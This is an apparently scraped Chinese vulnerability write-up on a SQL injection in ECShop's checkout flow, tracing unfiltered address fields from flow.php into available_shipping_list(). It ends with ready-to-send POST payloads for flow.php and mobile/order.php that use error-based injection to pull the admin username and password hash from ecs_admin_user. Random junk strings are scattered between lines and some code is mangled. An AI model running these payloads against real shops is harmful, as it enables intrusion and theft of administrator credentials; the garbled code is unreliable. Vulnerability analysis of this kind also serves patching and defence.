ecshop全版本注入分析

admin

前段时间大概2012年圣诞节左右，在t00ls上看见ecshop全版本注入，当时也下载了最新的程序分析了下,最近考试比较忙，今天刚考完，把我分析的记录下来。
+ V0 u' f7 Q7 ~' S/ `' I( z1 y
    漏洞关键文件：
9 S4 v6 C0 ~1 B% t
    /includes/lib_order.php

5 G# q* M! H8 `9 d    关键函数：
! a5 i% r/ Q9 k8 P0 |5 D

) y' e6 f$ y8 c5 q" [: h
01     function available_shipping_list($region_id_list)

/ X& V! E8 j4 ^1 t02 {
$ c9 R: [, X/ Y& |0 O# p* m, N& w
03     $sql = 'SELECT s.shipping_id, s.shipping_code, s.shipping_name, ' .

2 T. Z( Y1 S1 H  ~% x) k04                 's.shipping_desc, s.insure, s.support_cod, a.configure ' .
5 ?4 O6 n8 W  f
05             'FROM ' . $GLOBALS['ecs']->table('shipping') . ' AS s, ' .

06                 $GLOBALS['ecs']->table('shipping_area') . ' AS a, ' .

07                 $GLOBALS['ecs']->table('area_region') . ' AS r '.

08             'WHERE r.region_id ' . db_create_in($region_id_list) .

; Q) T6 a+ Z$ g! D8 G09             ' AND r.shipping_area_id = a.shipping_area_id AND a.shipping_id = s.shipping_id AND s.enabled = 1 ORDER BY s.shipping_order';

10   
1 B# s! F* ~9 m# p8 g, H, r
7 Q# d2 T0 U$ u: r11     return $GLOBALS['db']->getAll($sql);

12 }
, D, n2 P* q+ r
: u% t( I7 _( ?8 N: K" I8 U7 a显然对传入的参数没有任何过滤就带入了查询语句。
4 T$ o1 P6 P- [% o0 F, M% }
: l# i0 O. n4 Y/ x2 z6 B$ _下面我们追踪这个函数在flow.php中：
1 j' F0 K/ w6 k* i8 l0 p5 n% ? 第531行：   

1 $shipping_list     = available_shipping_list($region);
7 P7 f% E! g3 z9 u
+ A/ j" H, u) M" o  }
& f9 j, P9 {2 X7 I" }1 m+ }: X
2 k9 A1 l, s! n
3 G1 ]0 u; e+ n6 h
再对传入变量进行追踪：
' s/ h# f- e5 v: t8 }5 e* Y
+ Z" ?) S$ x: ?: o. w第530行：   
4 I% Y' ~$ S( S$ m0 w' L
. D6 a+ V- l! L* S- d1 $region = array($consignee['country'], $consignee['province'],$consignee['city'], $consignee['district']);
, _1 L9 X8 J- }

0 [/ P% ]# l! x" _1 z) D( G0 A$ z

! H9 L% S! f* y) `0 f
第473行：        
. s5 ?( i2 h: |: Q
& Q7 R& W. g3 N" |0 F1 $consignee = get_consignee($_SESSION['user_id']);

, d* O$ w& `* W; v( Q到了一个关键函数：
! C5 J& M; F. E. k6 ^# R( D$ P  p
! O1 K* h; `" S. C/includes/lib_order.php
8 M$ J* g0 @% d1 D& \) ?  e


0 D' P$ W# ^/ Z1 X( H8 u% {- m/ b

01 function get_consignee($user_id)
* ~& I% |$ R6 |( Z
9 [( Z, _* n4 g' C( ?2 b5 Y" f02 {

. A- s+ y5 L8 Y/ E2 d0 T6 T03     if (isset($_SESSION['flow_consignee']))

3 m  d3 M  [4 j5 W+ h04     {

05         /* 如果存在session，则直接返回session中的收货人信息 */

/ K& X9 I/ L/ Y06   

07         return $_SESSION['flow_consignee'];
$ {5 y3 N5 x) E+ Q: w
' m! ]( o3 n2 U- t. W; |- k7 H; H* R' a+ S08     }

09     else

! ~8 u: s4 p9 D6 T) O4 t10     {
" D9 U% @2 b% i
11         /* 如果不存在，则取得用户的默认收货人信息 */
# K, o- J) V$ g% Q. B* X
, W' `3 {$ ?! l. d; z12         $arr = array();

13   

, G" r2 C6 z' u14         if ($user_id > 0)
) [5 Y4 h' i* i
15         {
1 Y( S1 r$ ^; T. ]3 o! y! X
3 L, {9 x7 W; a4 y! s5 _7 w- s16             /* 取默认地址 */

# z) o+ C0 L% p4 J( X* ?17             $sql = "SELECT ua.*".

18                     " FROM " . $GLOBALS['ecs']->table('user_address') . "AS ua, ".$GLOBALS['ecs']->table('users').' AS u '.

19                     " WHERE u.user_id='$user_id' AND ua.address_id = u.address_id";
( S4 w/ [, k8 x  C2 K! t
6 V9 r: G) P2 S. W2 r20   

21             $arr = $GLOBALS['db']->getRow($sql);
3 c% v% r& q3 U
9 x3 K, y  D; ^& h22         }

23   
( B4 w9 V1 q% t+ b2 @! S4 d
( x/ d$ e' _7 o8 U3 |! r24         return $arr;
: r' g+ D, c, U% R
7 [3 u6 A. O5 E: Z7 ^* g& e25     }

. x7 x+ u9 }/ ^) u+ e/ \6 U& k& H26 }
7 _0 D$ E) z) v2 C+ j/ l1 y
7 i  B: i2 ]) M! q# [显然如果 isset($_SESSION['flow_consignee']存在就直接使用。到底存不存在呢？

  B% x4 q7 b% {9 y

& z& K0 v# e5 J; z8 `关键点:

) T4 D5 p- Y) M0 m$ s/ i第400行：    $_SESSION['flow_consignee'] = stripslashes_deep($consignee);

' T4 D; a0 y$ {0 @9 x这里对传入参数反转义存入$_SESSION中。

' q7 |$ h; q7 q0 `+ d# y$ O

: ?: r1 I# f+ t5 J4 z! T1 g0 v然后看下：



   

0 x5 ]& R+ z$ e: d1 @01 $consignee = array(
- c, Q# }1 |7 k1 b  P( p4 X
02         'address_id'    => empty($_POST['address_id']) ? 0  :intval($_POST['address_id']),
. {) A/ h7 C0 g0 ~: L/ ^
0 H% L* b7 v- l. V03         'consignee'     => empty($_POST['consignee'])  ? '' : trim($_POST['consignee']),
1 z# Z9 _  s' H' T2 K% v# p
$ w; a5 R: D7 A1 d6 u  ]- V' m04         'country'       => empty($_POST['country'])    ? '' _POST['country'],
! @+ p6 Q6 \3 e$ n$ n
0 Y8 D% Y- s. S+ M( c4 J7 L  I05         'province'      => empty($_POST['province'])   ? '' _POST['province'],

06         'city'          => empty($_POST['city'])       ? '' _POST['city'],
0 q5 B& ^- m5 g& \# h8 Y
07         'district'      => empty($_POST['district'])   ? '' _POST['district'],
* z1 V1 @5 n* M/ V& n
08         'email'         => empty($_POST['email'])      ? '' _POST['email'],

8 a  a% ^9 ^0 F' }* _$ w+ i0 x09         'address'       => empty($_POST['address'])    ? '' _POST['address'],

10         'zipcode'       => empty($_POST['zipcode'])    ? '' : make_semiangle(trim($_POST['zipcode'])),
( ]& C2 A. B4 D* c- d% L1 s
; F5 f9 l; h5 ~8 B& Z/ A* j  H11         'tel'           => empty($_POST['tel'])        ? '' : make_semiangle(trim($_POST['tel'])),
9 S+ v" Y" g* [- ~1 X8 A
" ]$ @' ?; j& p2 `9 w12         'mobile'        => empty($_POST['mobile'])     ? '' : make_semiangle(trim($_POST['mobile'])),
6 E9 Y6 E2 }7 b; i( R. _
* o: H4 O: Q8 [- v5 a: Y13         'sign_building' => empty($_POST['sign_building']) ? '' _POST['sign_building'],

2 h& w: ^3 H, w3 D% T+ J+ j5 ]14         'best_time'     => empty($_POST['best_time'])  ? '' _POST['best_time'],
, u& O5 @4 Z7 `6 Q$ D# x
15     );
4 \) m; Z. ?3 F: y; |: i
好了注入就这样出现了。

+ s+ ~, V" r+ Z0 E==================
+ ~; ?1 {5 X* S. R) j
' k2 V, e! N) ~6 r5 e注入测试：

. `: w- K% @0 f9 L3 v6 c: x环境:windows7+xampp1.7.7(Apache2.2.21+Php 5.3.8+Mysql 5.5.16)
2 d- ^( K9 f: F% W& @
( E& [9 T$ l' R2 P测试程序：ECShop_V2.7.3_UTF8_release1106
; K. o0 n8 o: r! M. l
9 e; `. A2 v+ i5 y9 Q/ K

1.首先需要点击一个商品加入购物车

4 k8 L/ |1 _5 |2 J+ I$ Q9 ^% a; S: r2.注册一个会员帐号
9 B' O. g6 t- {- ?
+ H2 k4 C& [6 J$ _3.post提交数据
4 U7 E' R! Z# J$ v
; O/ t/ U" W0 V: z; X/ U
: |- m+ e& R4 Q' n
- R! F) ]: v% G! E  ]1 http://127.0.0.1/ecshop/flow.php

$ @' E# h4 l- \8 Z2 s: m$ H) G4 x2   
6 L& R" \7 j! m2 i2 ^( Q  y; Q
3 country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=
+ ~, n2 l' a7 x& w$ z) ]+ Q举一反三，我们根据这个漏洞我们可以继续深入挖掘：

; p! T- P% \8 v/ Q2 o& m8 {+ b: c我们搜寻关键函数function available_shipping_list()

在文件/moblie/order.php中出现有，次文件为手机浏览文件功能基本和flow.php相同，代码流程基本相同
; ~& t4 y6 o. E% ~+ Z
利用exp:

# J- K  L7 }" u( O. I  e1.点击一个商品，点击购买商标

2.登录会员帐号
1 Y  ^, T$ i# L
/ y0 D7 N. F% c2 z/ s3.post提交：

http://127.0.0.1/ecshop/mobile/order.php
) M3 ]8 h- U. C3 ?/ D" f

' t# C8 ?. P' _. F8 O/ d
* l4 ^: M7 f7 k; S8 _( D. o4 Ycountry=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&&act=order_lise&address_id=

# N# u( S- Y7 b: _. {7 [